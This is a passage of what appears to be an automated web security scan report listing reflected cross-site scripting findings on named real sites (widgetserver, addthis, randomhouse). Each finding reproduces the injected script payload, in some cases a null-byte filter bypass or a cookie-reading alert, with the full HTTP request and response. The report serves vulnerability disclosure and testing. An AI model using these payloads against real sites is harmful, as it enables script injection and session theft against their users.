Vary: Accept-Encoding
Content-Length: 1162

WIDGETBOX.subscriber.Main.onWidgetInfoResponse({"widgets":[{"userPK":"","initParams":"","hasDynamicStyle":false,"appId":"077f25c8-0348-4215-9539-57b2ff17f13b74b03<a>2abf9f455e2","providerServiceLevel":"","fromPartnerNetworkCode":"","appWidth":"120","appHeight":"120","subscribeMode":"DISABLE_GW","regPK":"","instServiceLevel":"","shortDescr":"","serviceLevel":"","hasDynamicSiz
...[SNIP]...

5.110. http://cdn.widgetserver.com/syndication/json/i/3651dbe5-aec4-42b2-8270-d62db9a25bfe/iv/5/n/wbx/nv/2/p/2/r/6ba05ce8-62f3-46d0-bb21-b5f833b4817f/rv/367/t/34425cfc81ae44177f1d6c3dc87a11a7b3c559c30000012f8af78211/u/2/ [REST URL parameter 18]

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdn.widgetserver.com
Path:   /syndication/json/i/3651dbe5-aec4-42b2-8270-d62db9a25bfe/iv/5/n/wbx/nv/2/p/2/r/6ba05ce8-62f3-46d0-bb21-b5f833b4817f/rv/367/t/34425cfc81ae44177f1d6c3dc87a11a7b3c559c30000012f8af78211/u/2/

Issue detail

The value of REST URL parameter 18 is copied into the HTML document as plain text between tags. The payload 780d0<img%20src%3da%20onerror%3dalert(1)>252d78a442 was submitted in the REST URL parameter 18. This input was echoed as 780d0<img src=a onerror=alert(1)>252d78a442 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /syndication/json/i/3651dbe5-aec4-42b2-8270-d62db9a25bfe/iv/5/n/wbx/nv/2/p/2/r/6ba05ce8-62f3-46d0-bb21-b5f833b4817f/rv/367/t/34425cfc81ae44177f1d6c3dc87a11a7b3c559c30000012f8af78211780d0<img%20src%3da%20onerror%3dalert(1)>252d78a442/u/2/?callback=WIDGETBOX.subscriber.Main.onWidgetInfoResponse HTTP/1.1
Host: cdn.widgetserver.com
Proxy-Connection: keep-alive
Referer: http://www.widgetbox.com/mobile/builder/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript;charset=UTF-8
Date: Tue, 26 Apr 2011 21:51:54 GMT
Expires: Fri, 29 Apr 2011 21:50:54 GMT
P3P: CP="NON ADMa OUR IND PHY ONL UNI COM NAV STA"
Server: Apache/2.2.3 (Red Hat)
Vary: Accept-Encoding
Content-Length: 3912

WIDGETBOX.subscriber.Main.onWidgetInfoResponse({"widgets":[{"enabledState":"0","initParams":"siteConfig=%7B%22icon%22%3A+%22%22%2C+%22phoneIcon%22%3A%22%22%2C+%22tabletIcon%22%3A%22%22%2C+%22startupIm
...[SNIP]...
es":false,"isAdEnabled":false,"adPlacement":"","categories":"","thumbFilePath":"/thumbs/6ba05ce8-62f3-46d0-bb21-b5f833b4817f.png?367"}],"token":"34425cfc81ae44177f1d6c3dc87a11a7b3c559c30000012f8af78211780d0<img src=a onerror=alert(1)>252d78a442"});

5.111. http://cdn.widgetserver.com/syndication/json/i/3651dbe5-aec4-42b2-8270-d62db9a25bfe/iv/5/n/wbx/nv/2/p/2/r/6ba05ce8-62f3-46d0-bb21-b5f833b4817f/rv/367/t/34425cfc81ae44177f1d6c3dc87a11a7b3c559c30000012f8af78211/u/2/ [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Firm
Host:   http://cdn.widgetserver.com
Path:   /syndication/json/i/3651dbe5-aec4-42b2-8270-d62db9a25bfe/iv/5/n/wbx/nv/2/p/2/r/6ba05ce8-62f3-46d0-bb21-b5f833b4817f/rv/367/t/34425cfc81ae44177f1d6c3dc87a11a7b3c559c30000012f8af78211/u/2/

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 16936<a>d3f95d2f680 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /syndication/json/i/3651dbe5-aec4-42b2-8270-d62db9a25bfe16936<a>d3f95d2f680/iv/5/n/wbx/nv/2/p/2/r/6ba05ce8-62f3-46d0-bb21-b5f833b4817f/rv/367/t/34425cfc81ae44177f1d6c3dc87a11a7b3c559c30000012f8af78211/u/2/?callback=WIDGETBOX.subscriber.Main.onWidgetInfoResponse HTTP/1.1
Host: cdn.widgetserver.com
Proxy-Connection: keep-alive
Referer: http://www.widgetbox.com/mobile/builder/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: application/x-javascript;charset=UTF-8
Date: Tue, 26 Apr 2011 21:49:14 GMT
Expires: Sun, 7 May 1995 12:00:00 GMT
P3P: CP="NON ADMa OUR IND PHY ONL UNI COM NAV STA"
Pragma: no-cache
Server: Apache/2.2.3 (Red Hat)
Vary: Accept-Encoding
Content-Length: 1162

WIDGETBOX.subscriber.Main.onWidgetInfoResponse({"widgets":[{"userPK":"","initParams":"","hasDynamicStyle":false,"appId":"3651dbe5-aec4-42b2-8270-d62db9a25bfe16936<a>d3f95d2f680","providerServiceLevel":"","fromPartnerNetworkCode":"","appWidth":"120","appHeight":"120","subscribeMode":"DISABLE_GW","regPK":"","instServiceLevel":"","shortDescr":"","serviceLevel":"","hasDynamicSiz
...[SNIP]...

5.112. http://cdn.widgetserver.com/syndication/json/i/9dc88731-b2ec-4909-9bc6-b15b8881219b/iv/2/n/code/nv/4/p/1/r/a5eaf8f4-5bfb-4aa0-9d12-1707dde89c3e/rv/52/t/095ceb1aff68cc1170437fc8a7c33749a6e5729d0000012f8b0da168/u/1/ [REST URL parameter 18]

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdn.widgetserver.com
Path:   /syndication/json/i/9dc88731-b2ec-4909-9bc6-b15b8881219b/iv/2/n/code/nv/4/p/1/r/a5eaf8f4-5bfb-4aa0-9d12-1707dde89c3e/rv/52/t/095ceb1aff68cc1170437fc8a7c33749a6e5729d0000012f8b0da168/u/1/

Issue detail

The value of REST URL parameter 18 is copied into the HTML document as plain text between tags. The payload b607c<img%20src%3da%20onerror%3dalert(1)>58e425fd2c2 was submitted in the REST URL parameter 18. This input was echoed as b607c<img src=a onerror=alert(1)>58e425fd2c2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /syndication/json/i/9dc88731-b2ec-4909-9bc6-b15b8881219b/iv/2/n/code/nv/4/p/1/r/a5eaf8f4-5bfb-4aa0-9d12-1707dde89c3e/rv/52/t/095ceb1aff68cc1170437fc8a7c33749a6e5729d0000012f8b0da168b607c<img%20src%3da%20onerror%3dalert(1)>58e425fd2c2/u/1/?callback=WIDGETBOX.subscriber.Main.onWidgetInfoResponse HTTP/1.1
Host: cdn.widgetserver.com
Proxy-Connection: keep-alive
Referer: http://www.aac.org/site/TR/Events/AWB08?pg=team&fr_id=1110&team_id=24880
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript;charset=UTF-8
Date: Tue, 26 Apr 2011 21:49:27 GMT
Expires: Fri, 29 Apr 2011 21:48:27 GMT
P3P: CP="NON ADMa OUR IND PHY ONL UNI COM NAV STA"
Server: Apache/2.2.3 (Red Hat)
Vary: Accept-Encoding
Content-Length: 7210

WIDGETBOX.subscriber.Main.onWidgetInfoResponse({"widgets":[{"enabledState":"0","initParams":"wbx_theme_mod=%236DA4D8&wbx_stageHeight=500&wbx_tab_1_default_image=http%3A%2F%2Ffiles.widgetbox.com%2Fserv
...[SNIP]...
s":false,"isAdEnabled":false,"adPlacement":"TL","categories":"","thumbFilePath":"/thumbs/a5eaf8f4-5bfb-4aa0-9d12-1707dde89c3e.jpg?52"}],"token":"095ceb1aff68cc1170437fc8a7c33749a6e5729d0000012f8b0da168b607c<img src=a onerror=alert(1)>58e425fd2c2"});

5.113. http://cdn.widgetserver.com/syndication/json/i/9dc88731-b2ec-4909-9bc6-b15b8881219b/iv/2/n/code/nv/4/p/1/r/a5eaf8f4-5bfb-4aa0-9d12-1707dde89c3e/rv/52/t/095ceb1aff68cc1170437fc8a7c33749a6e5729d0000012f8b0da168/u/1/ [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Firm
Host:   http://cdn.widgetserver.com
Path:   /syndication/json/i/9dc88731-b2ec-4909-9bc6-b15b8881219b/iv/2/n/code/nv/4/p/1/r/a5eaf8f4-5bfb-4aa0-9d12-1707dde89c3e/rv/52/t/095ceb1aff68cc1170437fc8a7c33749a6e5729d0000012f8b0da168/u/1/

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 78066<a>4feec1bf34c was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /syndication/json/i/9dc88731-b2ec-4909-9bc6-b15b8881219b78066<a>4feec1bf34c/iv/2/n/code/nv/4/p/1/r/a5eaf8f4-5bfb-4aa0-9d12-1707dde89c3e/rv/52/t/095ceb1aff68cc1170437fc8a7c33749a6e5729d0000012f8b0da168/u/1/?callback=WIDGETBOX.subscriber.Main.onWidgetInfoResponse HTTP/1.1
Host: cdn.widgetserver.com
Proxy-Connection: keep-alive
Referer: http://www.aac.org/site/TR/Events/AWB08?pg=team&fr_id=1110&team_id=24880
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: application/x-javascript;charset=UTF-8
Date: Tue, 26 Apr 2011 21:46:37 GMT
Expires: Sun, 7 May 1995 12:00:00 GMT
P3P: CP="NON ADMa OUR IND PHY ONL UNI COM NAV STA"
Pragma: no-cache
Server: Apache/2.2.3 (Red Hat)
Vary: Accept-Encoding
Content-Length: 1162

WIDGETBOX.subscriber.Main.onWidgetInfoResponse({"widgets":[{"userPK":"","initParams":"","hasDynamicStyle":false,"appId":"9dc88731-b2ec-4909-9bc6-b15b8881219b78066<a>4feec1bf34c","providerServiceLevel":"","fromPartnerNetworkCode":"","appWidth":"120","appHeight":"120","subscribeMode":"DISABLE_GW","regPK":"","instServiceLevel":"","shortDescr":"","serviceLevel":"","hasDynamicSiz
...[SNIP]...

5.114. http://cdn.widgetserver.com/syndication/json/i/a2cf3a06-8341-401d-9929-c445542d58f5/iv/3/n/code/nv/4/p/0/r/8e8d4b61-3cef-4782-bdf3-34277bd49172/rv/132/t/e319266ef2e04c39f5ae5accf233b10078f950d70000012f8ab5b5e1/u/2/ [REST URL parameter 18]

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdn.widgetserver.com
Path:   /syndication/json/i/a2cf3a06-8341-401d-9929-c445542d58f5/iv/3/n/code/nv/4/p/0/r/8e8d4b61-3cef-4782-bdf3-34277bd49172/rv/132/t/e319266ef2e04c39f5ae5accf233b10078f950d70000012f8ab5b5e1/u/2/

Issue detail

The value of REST URL parameter 18 is copied into the HTML document as plain text between tags. The payload b670d<img%20src%3da%20onerror%3dalert(1)>0648de1f413 was submitted in the REST URL parameter 18. This input was echoed as b670d<img src=a onerror=alert(1)>0648de1f413 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /syndication/json/i/a2cf3a06-8341-401d-9929-c445542d58f5/iv/3/n/code/nv/4/p/0/r/8e8d4b61-3cef-4782-bdf3-34277bd49172/rv/132/t/e319266ef2e04c39f5ae5accf233b10078f950d70000012f8ab5b5e1b670d<img%20src%3da%20onerror%3dalert(1)>0648de1f413/u/2/?callback=WIDGETBOX.subscriber.Main.onWidgetInfoResponse HTTP/1.1
Host: cdn.widgetserver.com
Proxy-Connection: keep-alive
Referer: http://www.widgetbox.com/list/most_popular
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript;charset=UTF-8
Date: Tue, 26 Apr 2011 21:51:54 GMT
Expires: Fri, 29 Apr 2011 21:50:54 GMT
P3P: CP="NON ADMa OUR IND PHY ONL UNI COM NAV STA"
Server: Apache/2.2.3 (Red Hat)
Vary: Accept-Encoding
Content-Length: 2654

WIDGETBOX.subscriber.Main.onWidgetInfoResponse({"widgets":[{"enabledState":"0","initParams":"wbx_framerate=30&wbx_stageHeight=250&wbx_stageWidth=300","isFlashWrapperCompatible":true,"appWidth":"300","
...[SNIP]...
,"isAdEnabled":true,"adPlacement":"","categories":"blogs,news","thumbFilePath":"/thumbs/8e8d4b61-3cef-4782-bdf3-34277bd49172.png?132"}],"token":"e319266ef2e04c39f5ae5accf233b10078f950d70000012f8ab5b5e1b670d<img src=a onerror=alert(1)>0648de1f413"});

5.115. http://cdn.widgetserver.com/syndication/json/i/a2cf3a06-8341-401d-9929-c445542d58f5/iv/3/n/code/nv/4/p/0/r/8e8d4b61-3cef-4782-bdf3-34277bd49172/rv/132/t/e319266ef2e04c39f5ae5accf233b10078f950d70000012f8ab5b5e1/u/2/ [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Firm
Host:   http://cdn.widgetserver.com
Path:   /syndication/json/i/a2cf3a06-8341-401d-9929-c445542d58f5/iv/3/n/code/nv/4/p/0/r/8e8d4b61-3cef-4782-bdf3-34277bd49172/rv/132/t/e319266ef2e04c39f5ae5accf233b10078f950d70000012f8ab5b5e1/u/2/

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 5147c<a>ad3be1bde7f was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /syndication/json/i/a2cf3a06-8341-401d-9929-c445542d58f55147c<a>ad3be1bde7f/iv/3/n/code/nv/4/p/0/r/8e8d4b61-3cef-4782-bdf3-34277bd49172/rv/132/t/e319266ef2e04c39f5ae5accf233b10078f950d70000012f8ab5b5e1/u/2/?callback=WIDGETBOX.subscriber.Main.onWidgetInfoResponse HTTP/1.1
Host: cdn.widgetserver.com
Proxy-Connection: keep-alive
Referer: http://www.widgetbox.com/list/most_popular
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: application/x-javascript;charset=UTF-8
Date: Tue, 26 Apr 2011 21:49:04 GMT
Expires: Sun, 7 May 1995 12:00:00 GMT
P3P: CP="NON ADMa OUR IND PHY ONL UNI COM NAV STA"
Pragma: no-cache
Server: Apache/2.2.3 (Red Hat)
Vary: Accept-Encoding
Content-Length: 1162

WIDGETBOX.subscriber.Main.onWidgetInfoResponse({"widgets":[{"userPK":"","initParams":"","hasDynamicStyle":false,"appId":"a2cf3a06-8341-401d-9929-c445542d58f55147c<a>ad3be1bde7f","providerServiceLevel":"","fromPartnerNetworkCode":"","appWidth":"120","appHeight":"120","subscribeMode":"DISABLE_GW","regPK":"","instServiceLevel":"","shortDescr":"","serviceLevel":"","hasDynamicSiz
...[SNIP]...

5.116. http://cdn.widgetserver.com/syndication/mobile/x/css/preview.css [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdn.widgetserver.com
Path:   /syndication/mobile/x/css/preview.css

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload f0666<script>alert(1)</script>06d3328fdbc was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /syndication/mobilef0666<script>alert(1)</script>06d3328fdbc/x/css/preview.css?48996 HTTP/1.1
Host: cdn.widgetserver.com
Proxy-Connection: keep-alive
Referer: http://www.widgetserver.com/syndication/html5/3651dbe5-aec4-42b2-8270-d62db9a25bfe?widget.appId=3651dbe5-aec4-42b2-8270-d62db9a25bfe&widget.regId=6ba05ce8-62f3-46d0-bb21-b5f833b4817f&widget.friendlyId=msite-ext&widget.name=Mobile%20Web%20App&widget.token=34425cfc81ae44177f1d6c3dc87a11a7b3c559c30000012f8af78211&widget.sid=a421bc15422e4aa32fb9e2416e0bd7cc&widget.vid=a421bc15422e4aa32fb9e2416e0bd7cc&widget.id=0&widget.location=http%3A%2F%2Fwww.widgetbox.com%2Fmobile%2Fbuilder%2F&widget.timestamp=1303854400940&widget.serviceLevel=0&widget.provServiceLevel=2&widget.instServiceLevel=1&widget.width=320&widget.height=460&widget.wrapper=JAVASCRIPT&widget.isAdFriendly=false&widget.isAdEnabled=false&widget.adChannels=&widget.adPlacement=&widget.prototype=MOBILE_APP&widget.ua=mozilla%2F5.0%20%28windows%3B%20u%3B%20windows%20nt%206.1%3B%20en-us%29%20applewebkit%2F534.16%20%28khtml%2C%20like%20gecko%29%20chrome%2F10.0.648.205%20safari%2F534.16&widget.version=5&widget.output=htmlcontent&widget.appPK=145923021&widget.regPK=4248409&widget.providerPK=1860293&widget.userPK=67922830
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/css
Date: Tue, 26 Apr 2011 21:48:52 GMT
Expires: Thu, 31 Dec 2020 00:00:00 GMT
Last-Modified: Wed, 20 Apr 2011 23:47:00 GMT
max-age: 604800
P3P: CP="NON ADMa OUR IND PHY ONL UNI COM NAV STA"
Server: Apache/2.2.3 (Red Hat)
Vary: Accept-Encoding
Content-Length: 119

The requested resource(/syndication/mobilef0666<script>alert(1)</script>06d3328fdbc/x/css/preview.css) is not available

5.117. http://ds.addthis.com/red/psi/sites/www.bertelsmann.com/p.json [callback parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ds.addthis.com
Path:   /red/psi/sites/www.bertelsmann.com/p.json

Issue detail

The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload 1d121<script>alert(1)</script>cb3f46b8a8 was submitted in the callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /red/psi/sites/www.bertelsmann.com/p.json?callback=_ate.ad.hpr1d121<script>alert(1)</script>cb3f46b8a8&uid=4dab4fa85facd099&url=http%3A%2F%2Fwww.bertelsmann.com%2Fbertelsmann_corp%2Fwms41%2Fbm%2Findex.php%3Flanguage%3D2%2650700%2522%253E%253Cscript%253Ealert(document.cookie)%253C%2Fscript%253Ee85a0f4245a%3D1&ref=http%3A%2F%2Fburp%2Fshow%2F38&11jhoxa HTTP/1.1
Host: ds.addthis.com
Proxy-Connection: keep-alive
Referer: http://s7.addthis.com/static/r07/sh39.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: loc=US%2CMjAwMDFOQVVTREMyMTg4MTAyOTUxMTg4NzIwVg%3d%3d; uit=1; dt=X; di=%7B%7D..1303775135.1FE|1303775135.60; psc=4; uid=4dab4fa85facd099

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Length: 130
Content-Type: text/javascript
Set-Cookie: bt=; Domain=.addthis.com; Expires=Tue, 26 Apr 2011 23:30:15 GMT; Path=/
Set-Cookie: dt=X; Domain=.addthis.com; Expires=Thu, 26 May 2011 23:30:15 GMT; Path=/
P3P: policyref="/w3c/p3p.xml", CP="NON ADM OUR DEV IND COM STA"
Expires: Tue, 26 Apr 2011 23:30:15 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 26 Apr 2011 23:30:15 GMT
Connection: close

_ate.ad.hpr1d121<script>alert(1)</script>cb3f46b8a8({"urls":[],"segments" : [],"loc": "MjAwMDFOQVVTREMyMTg4MTAyOTUxMTg4NzIwVg=="})

5.118. http://ecommerce.randomhouse.com/cart.do [from parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ecommerce.randomhouse.com
Path:   /cart.do

Issue detail

The value of the from request parameter is copied into the HTML document as plain text between tags. The payload %00de38d<script>alert(1)</script>e9bd80595cd was submitted in the from parameter. This input was echoed as de38d<script>alert(1)</script>e9bd80595cd in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Request

GET /cart.do?from=%27%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000B6E)%3C/script%3E%00de38d<script>alert(1)</script>e9bd80595cd&addFlag=false&coupon=3&submit=Apply HTTP/1.1
Host: ecommerce.randomhouse.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: RES_TRACKINGID=686529694590717; __qca=P0-874375948-1303855562358; s_vi=[CS]v1|26DBA0E0051D3102-60000104C025ACEA[CE]; s_cc=true; s_sq=%5B%5BB%5D%5D; SC_LINKS=%5B%5BB%5D%5D; JSESSIONID=916E1DF250E4C8F9A222E994DF92BDD0.ecommerce_wrk1; CP=null*; mbox=session#1303855598284-166145#1303859906|PC#1303855598284-166145#1366930046|check#true#1303858106; RES_SESSIONID=212207240983843; ResonanceSegment=1

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 22:48:07 GMT
Server: Apache
Set-Cookie: rhcartitems=; Domain=.randomhouse.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 20031


<!-- shoppingCart.vm -->


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...
</script>.de38d<script>alert(1)</script>e9bd80595cd">
...[SNIP]...

5.119. http://ecommerce.randomhouse.com/cart.do [from parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ecommerce.randomhouse.com
Path:   /cart.do

Issue detail

The value of the from request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 49283"%3balert(1)//e4e0e74635 was submitted in the from parameter. This input was echoed as 49283";alert(1)//e4e0e74635 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /cart.do?from=randomhouse49283"%3balert(1)//e4e0e74635 HTTP/1.1
Host: ecommerce.randomhouse.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: RES_TRACKINGID=686529694590717; RES_SESSIONID=212207240983843; ResonanceSegment=1; __qca=P0-874375948-1303855562358; s_cc=true; SC_LINKS=%5B%5BB%5D%5D; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|26DBA0E0051D3102-60000104C025ACEA[CE]

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 22:06:26 GMT
Server: Apache
Set-Cookie: JSESSIONID=6766FA4ECEF48F7FBF98EEE206AFFBC1.ecommerce_wrk1; Path=/
Set-Cookie: rhcartitems=; Domain=.randomhouse.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 19589


<!-- shoppingCart.vm -->


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...
<!--
var s_account="ranhcorporate,ranhrollup";
var rh_division="Random House Corporate";
var rh_imprint="";
var rh_store="randomhouse49283";alert(1)//e4e0e74635";
//-->
...[SNIP]...

5.120. http://ecommerce.randomhouse.com/cart.do [from parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ecommerce.randomhouse.com
Path:   /cart.do

Issue detail

The value of the from request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 17962"><script>alert(1)</script>6f8a1d41037 was submitted in the from parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /cart.do?from=randomhouse17962"><script>alert(1)</script>6f8a1d41037 HTTP/1.1
Host: ecommerce.randomhouse.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: RES_TRACKINGID=686529694590717; RES_SESSIONID=212207240983843; ResonanceSegment=1; __qca=P0-874375948-1303855562358; s_cc=true; SC_LINKS=%5B%5BB%5D%5D; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|26DBA0E0051D3102-60000104C025ACEA[CE]

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 22:06:25 GMT
Server: Apache
Set-Cookie: JSESSIONID=CF4601245B0C770882DDB50544AA239B.ecommerce_wrk1; Path=/
Set-Cookie: rhcartitems=; Domain=.randomhouse.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 19701


<!-- shoppingCart.vm -->


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...
<a class="rollover" href="http://ecommerce.randomhouse.com/cart.do?from=randomhouse17962"><script>alert(1)</script>6f8a1d41037">
...[SNIP]...

5.121. https://ecommerce.randomhouse.com/account.do [from parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://ecommerce.randomhouse.com
Path:   /account.do

Issue detail

The value of the from request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 74f99'%3balert(1)//44955d1d1a9 was submitted in the from parameter. This input was echoed as 74f99';alert(1)//44955d1d1a9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Request

